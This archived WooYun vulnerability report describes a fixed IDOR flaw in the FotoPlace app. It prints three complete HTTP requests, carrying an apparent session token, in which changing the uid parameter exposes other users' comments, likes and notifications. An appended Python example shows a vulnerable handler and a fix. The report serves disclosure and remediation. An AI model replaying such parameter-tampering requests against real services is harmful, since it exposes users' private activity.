WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-06-14: Details reported to the vendor, awaiting vendor response
2015-06-14: Vendor confirmed; details disclosed to the vendor only
2015-06-24: Details disclosed to core white hats and domain experts
2015-07-04: Details disclosed to regular white hats
2015-07-14: Details disclosed to intern white hats
2015-07-29: Details disclosed to the public
As the title says.
In the user messages area, several endpoints have a horizontal privilege escalation flaw: changing the uid parameter lets one read any other user's sensitive activity records.
Taking the official FotoPlace (足记) account, id 1, as an example. Comments:
POST /api2/user/user_get_comment.php HTTP/1.1
Host: fotoplace.cc
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: cookie_tempuid=192.168.100.614266984861566120746
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-Hans;q=1, en;q=0.9
Content-Length: 97
Connection: keep-alive
User-Agent: FotoPlace/15050821 (iPhone; iOS 8.1.3; Scale/2.00)

offset=0&token=da8648e41ee0a0cf5da9da76c5aea11dc4eec6fdc39c74121ca4c2b95b76e864&uid=1&version=2.6
Likes:
POST /api2/user/user_get_like_list.php HTTP/1.1
Host: fotoplace.cc
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: cookie_tempuid=192.168.100.614266984861566120746
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-Hans;q=1, en;q=0.9
Content-Length: 103
Connection: keep-alive
User-Agent: FotoPlace/15050821 (iPhone; iOS 8.1.3; Scale/2.00)

offset=0&token=da8648e41ee0a0cf5da9da76c5aea11dc4eec6fdc39c74121ca4c2b95b76e864&uid=6146812&version=2.6
Notifications:
POST /api2/user/user_get_notice_list.php HTTP/1.1
Host: fotoplace.cc
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: cookie_tempuid=192.168.100.614266984861566120746
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-Hans;q=1, en;q=0.9
Content-Length: 106
Connection: keep-alive
User-Agent: FotoPlace/15050821 (iPhone; iOS 8.1.3; Scale/2.00)

pageindex=0&token=da8648e41ee0a0cf5da9da76c5aea11dc4eec6fdc39c74121ca4c2b95b76e864&uid=6146812&version=2.6
Every operation should first verify the identity binding (the sign) on the request before acting on it.
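As an added example (not FotoPlace's code), the following shows how the check the report calls for can be applied to endpoints like the three above: the account is derived from the session token, and a uid that does not match it is refused and logged rather than served. The token store, uids and comment data are constructed sample values.

```python
# Added example, not the vendor's code. Models a handler for an endpoint such as
# /api2/user/user_get_comment.php that receives both a session token and a uid.
# SESSIONS and COMMENTS are constructed sample data standing in for a real store.

# token -> uid of the account the token was issued to (constructed)
SESSIONS = {"tok-alice": 6146812, "tok-official": 1}

# uid -> that user's comment activity (constructed)
COMMENTS = {1: ["official: welcome to the app"], 6146812: ["alice: nice shot"]}

# Audit trail of refused requests; a real service would send these to its logs.
AUDIT = []


class Unauthorized(Exception):
    """Token missing, unknown or expired."""


class Forbidden(Exception):
    """Token valid, but it does not own the requested resource."""


def resolve_uid(token: str) -> int:
    """Return the uid the token was issued to; reject unknown tokens."""
    uid = SESSIONS.get(token)
    if uid is None:
        raise Unauthorized("invalid or expired token")
    return uid


def get_comments_vulnerable(params: dict) -> list:
    """The flaw in the report: authenticates the token, then trusts the client's uid."""
    resolve_uid(params["token"])  # proves who is calling, but not what they may read
    return COMMENTS.get(int(params["uid"]), [])


def get_comments_fixed(params: dict) -> list:
    """Subject comes from the token; a uid that disagrees with it is refused, not honoured."""
    owner = resolve_uid(params["token"])
    requested = params.get("uid")
    if requested is not None and int(requested) != owner:
        # Record the mismatch: repeated hits from one token are a strong IDOR indicator.
        AUDIT.append({"owner": owner, "requested_uid": int(requested)})
        raise Forbidden("uid does not belong to the authenticated session")
    return COMMENTS.get(owner, [])
```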
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-06-14 23:46
Being processed; thank you for reporting the vulnerability.
2015-06-16: Fixed